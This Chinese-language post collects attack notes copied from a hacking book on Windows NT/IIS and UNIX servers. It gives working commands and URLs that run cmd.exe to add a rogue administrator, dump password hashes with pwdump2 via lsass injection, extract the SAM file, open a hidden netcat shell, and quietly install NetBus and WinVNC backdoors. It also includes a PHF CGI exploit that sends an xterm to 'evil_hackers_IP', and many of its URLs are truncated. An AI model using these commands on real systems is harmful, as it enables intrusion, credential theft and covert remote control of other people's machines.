还在用木马等鱼儿上勾,然后用prot扫瞄,或偷窥icp漏洞,或是猜密码,或放或寄病毒网页
等人打开来这些初等或中等的攻击法吗??美国骇客的实力真是另人无法想像,
他们只需利用网址就能轻而意举的主动攻击了,情结不输给电影,我们的手法
对他们而言只是无须大惊小怪的小儿科......参考书为黑红色的网路骇客与系统安全
(好像有新版的,小皇是旧版的,名称与外关差不多)
书籍上的重点,作者是美国着名的网路安全专家,
远端缓冲区溢满{buffer overflow}
缓冲区溢满是发生在程式没有适当的检查输入内容的长度
,而导致缓冲区空间不足,因此,任何预期之外的输入,就会
掩盖掉CPU执行堆叠的其它部分.
远端执行命令取得系统管理者权限
http://www.infowar....nemonix 远端执行一个批次档执行任意的程式
http://www.infowar.co.uk/mnem...overruns.htm ISSHACK
http://www.e...com 在NT ISS网页伺服器上执行程式码
在本机中可以给使一位使用者加入到区域的管理者群组中的扩权程式
http://www.ntsecurity.net/...tadmin.htm 有相似功能的其它程式 sechole升级版是secholed
http://www.ntsecurity.net...echole.htm (Domain Admin group) 网域管理者(升级)群组
cmd.exe NT命令解释器
ntuser 程式 用来修改使用者,群组和政策的程式,可参考
http://www.pedesta...re.com Sechole的启动可靠在一个浏览器输入一个适当的URL连网目标系统,例如下列
我们将Sechole上传至/W3SVC/1/ROOT/SCRIPTS (这里就是C:\inetpub\SCRIPTS)
然后用下面的URL网址启动它
http://192.168.202.154/s...holle.exe 这样做会成功的将IUSR_machine_name帐号加入管理者群组中,我们并没有
IUSR的密码,因此我们为了要避免登入IUSR,通常是在目标系统上开个帐号,
做法是利用ntuser公用程式透过浏览器执行下列复杂的URL(为了方便阅读内容经过装饰)
http://192.168.202.154/sc...xe?/c%20c:\C:\inetpub\scripts\ntuser.exe%20-s%20corpl%20add%20mallory%20-password%20secret
以上%20再网语中是空白的意思,所以以上网址会被执行为
(cmd /c 会送出ntuser命令到shell,在完成时终结自己)
cmd /c ntuser -s <servername> add <username> -password <password>
以上我们是以corpl做伺服机名称,mallory是使用者名称,secret当密码,
用类似的URL攻击者可以用ntuser帮你把mallory加到管理者群组里,如下 (LORGUP是指某个区域群组)
cmd /c ntuser -s <servername> LORGUP APPEND <groupname> <username>...
http://192.168.202.154/sc...xe?/c%20c:\C:\inetpub\scripts\ntuser.exe%20-s%20corpl%20lgroup%20Administrators%20mallory
同机能的批次档写法如registry,cmd
内容: net localgroup administrators <USER> /add
安全系统ISS目录和一些潜在可行的目录
http://www.iss.net/xforce...vise6.html 以下/W3SVC/1/ROOT通常是指C:\Inetpub\还有News及Mail
/W3SVC/1/ROOT/msade
/W3SVC/1/ROOT/cgi-bin
/W3SVC/1/ROOT/SCRIPTS
/W3SVC/1/ROOT/ISSADMPWD
/W3SVC/1/ROOT/_vti_bin
/W3SVC/1/ROOT/_vti_bin/_vti_adm
/W3SVC/1/ROOT/_vti_bin/_vti_aut
(_vti_bin都是安装Front Page之后衍生出来的)
放批次档的地方
HKLM\software\Microsoft\CurrentVersion
\RUN [any]
\AeDebug Debugger
\WinLogon Userinit
------------------------------------------------------------
执行NT的NT Repair Disk Utility (rdisk) 会在%SYSTEMROOT%\repair
中产生一个压缩过的SAM档叫SAM._ ,还原法: C:\>expand SAM._ SAM
NTFDOS:NTFS驱动软体
http://www.sysin...s.com 可破SYSKEY的是Pwdump2
http://www.webspan.n...pwdump2 它可使用DLL注入的方法将自己的程式码插入其它具有更高权限的行程中,
一但注入更高权限的行程之后,这些恶质的执行码就可以自由的内部呼叫API,
来存取SYSKEY加密的密码而不需将其解密.
pwdump2所瞄准的高权限行程是lsass.exe,它是区域安全授权子系统,
Pwd2是将自己注入到lsass的位址空间中,因此在执行Pwdump2之前必需动手
找出lsass.exe的行程边号(PID),以下是用NTRK里的pulist公用程式并将
输出导向find找出lsass.exe的PID为50
(以下C:\代表本机,D:\代表远端主机)
D:\>pulist | find "lsass"
lsass.exe 50 NT AUTHORITY\SYSTEM
现在Pwdump2可以使用PID 50来执行了,预设下会将它的输出
显示在莹慕上,可以很容意的导向一个档案
D:\>pwdump2 50
ASCII无法显示的字元Num Lock)ALT-255或ALT-129
用AT执行远端排程 (双引号)
C:\>at \\192.168.202.44 10:40P""remote /s cmd secret""
去除可用"[job id] /delete"
远端查时间c:>\sc \\192.168.202.44 start schedule
sc.exe是可启动排程服务 C:>\net time \\192.168.202.44
以下D:\代表本机C:\代表远端
D:\>remote /c 192.168.202.44
secret
C:\>Dir winnt\repair\Sam._
C:\>@Q (结束用户端)
C:>\@k (结束伺服端)
但remote不可启动认何用到Win32 console API的程式
remote.exe /C为用户端 /S为伺服模式
远端监视抓取萤幕
http://www.uk.resea...com/vnc -----------------------------
Netcat
以下是使用command来聆听
-L 不会停止
-d 暗中进行,不会有户动的主控台
-e 是指定启动NT命令的解释器,
远端为C:\TEMP\NC11NT
-p 是指定聆听的通讯阜
C:\TEMP\NT11NT>nc -L -d -e cmd.exe -p 8080
例 C:\TEMP\NT11NT>nc 192.168.202.44 8080
D:\temp\regini -m \\192.168.202.44 netbus.txt
NTRK中的regini.exe可以直接把必要的项目加入到远端的Registry内
REGINI读取文字档当做输入来进行Registry的修改,所以我们必需建立一个
Netbus.txt的档案出来
D:\temp\regini -m \\192.168.202.44 netbus.txt
的档案内容如下 !!!详细请到书局查阅,不知有没有抄正却!!!
HKEY_LOCAL_MACHINE\SOFTWARE\Net Solutions\NetBus Server\Genera
Accept=1
TCPPort=80
Visibility=3 在隐藏模式下执行
AccessMode=2
AutoStart=1 在windows启动时执行
HKEY_LOCAL_MACHINE\SOFTWARE\Net Solutions\NetBus Server\Protection
password=impossible
WinVNC的用法第一部将必要档复制到目标系统(winVNC.exe,VNCHooks.dll,OMNI THREAD_RT.DLL)
2.设定使用此程式的密码,建一个叫WINVNC.INI的档案内容如下
!!!详细请到书局查阅,不知有没有抄正却!!!
HKEY_USER\.DEFAULT\software\ORL\WinVNC3
SocketConnect=REG_DWORD
0x00000001
password=REG_BINARY 0x00000008
然后使用regini将这些值载入到远端Registry内
C:\>regini -m \\192.168.202.33 winvnc.ini
NTRK的regdmp公用程式是可把Registry转录下来
最后将winVNC安装起来成为伺服程式并启动它,下列的远端命令,(记得这是远端命令)
C:\>WinVNC -install
C:\>net start winvnc
现在我门就可以启动vncviewer程式并和我们的目标连线,
下图是设定连线到"显示0"IP的位置,下一步是密码
___________________________________________
| vncSERVER |192.168.202.33.0 |v|
===========================================
待续.....
截取修改密码
http://www.ntsecurity.net/se...orddll.html 下例是可直接显示原始码,Netscape是存档
http://www.Company.com/scr...asp::$DATE APS档后面多加句点就有机会看见原始档,或以16进位来破姐修正版
http://www.Company.com...mple.asp. http://www.Company.com/...ple%2easp --------------------------------------
一部机器的SID是一串数字,以S-1开头,并以卵横号分成好几段,而最后一祖
的数字称为RID,对于NT内建的使用者与群组都有预先定意的RID,
例如Administrator的RID码一定都是500,而GUEST为501,骇客可用sid2user来找出
已知SID和RID为500来找出管理者的帐号名称(既使改过名称)
C:\>sid2user \\192.168.2.33 8915387 1645822062 18....5 500 (S-1和短横号是省略的)
http://www.chem.msu.su:80...NT/sid.txt http://www.ntmag.com/Magazine/...rtideID=3143 -----------------------------------------
最佳的xterm
UNIX可在相容的机器上显示X Window,也能透过prot -6063显示在远端的
X伺服器上,然而加上-dispaly参数攻击者可以将他自己的命令介面层导向自己
的X伺服器,可以改良原PHF攻击方式/cgi-bin/phf?Qalias=z%0a/bin/cat%20/etc/passwd
既然攻击者具有在网页伺服器上执行远端命令的能力,只要把这个攻击稍微修改一下
,就可以获取交谈式介面层存取,攻击者要做的是将命令内容中的/bin/cat
/etc/passwd 改成 /usr/X11R6/bin/xterm -ut -dispaly evil_hackers_IP:0.0 完整的命令如下:
/cgi-bin/phf?Qalias=z%0a/usr/X11R6/bin/xterm%20-ut%20-dispaly%20evil_hackers_IP:0.0
上面这个是在远端的网页伺服器就会执行xterm并且显示在攻击者(evil_hackers)的X伺服器上
(视窗ID=0;萤幕ID=0),因为我们加上了-ut参数,因此这个动作并不会被系统记录
下来,这样攻击者跟本不需要登入任何伺服程式就可以获得教谈式介面层存取,
通常我们会使用xterm的完整路径,因为我们攻击展开时,其PATH环境参数不一定设定
符合我们的需求,使用完整路径才能却保网页伺服器可以顺利找到xterm执行档
===================================================
port service
7 echo
9 discard
13 daytime
19 Chargen
21 ftp
22 ssh
23 telnet
25 smtp
25 smap
37 time
53 dns
79 finger
80 http
110 pop3
111 sunrpc
139 netbois
143 imap
443 https
512 exec
513 login
514 shell
2049 nfs
4045 lockd
31337 UDP (BO)
12345 TCP (NetBus)
1394 DVD
31337 unassigned
12345 unassigned
135-139 UPD和TCP/IP
LINUX用网路结构探勘工具
http://www.marko...heops 超级抓站软体
http://www.blighty.co...ts/spade的Sam Spade还有Crawl,Website
泄漏档案内容,只要攻击者知道档案位置并以非标准的URL送出要求....
详
http://www.microsoft.com/secur.../ms99-010.asp 网路007
http://www.sam....org/ 作叶系统探知器Queso
http://www.apostols...ojectz/ 网路源由结构图
http://www.visu...e.com的VisualRoute
网路结构探索工具
http://www.marko...heops http://www.home.cs.utwen...enw/scotty的Tkined原本是Scotty函式库的一部份
Nnmap的更新工具
http://www.insecure.org:80/...-submit.cgi http://www.remotel...re.com网页NT管理工具Remotely Anywhere
2.Remotely Possible / Control IT
http://www....com的Control IT可在Windows,Linux,Solaris上用
http://www.uk.resea...com/Vnc queue处理器的伫列
dual-homed两栖主机
HTML换行码%0a
HTML空格码%20
Virtual虚拟
Private丝人
back channel回传通道 ,定意:一个通讯管道起始端为目标系统而非攻击端
shared library共享函式库
signal信号
aliase化名
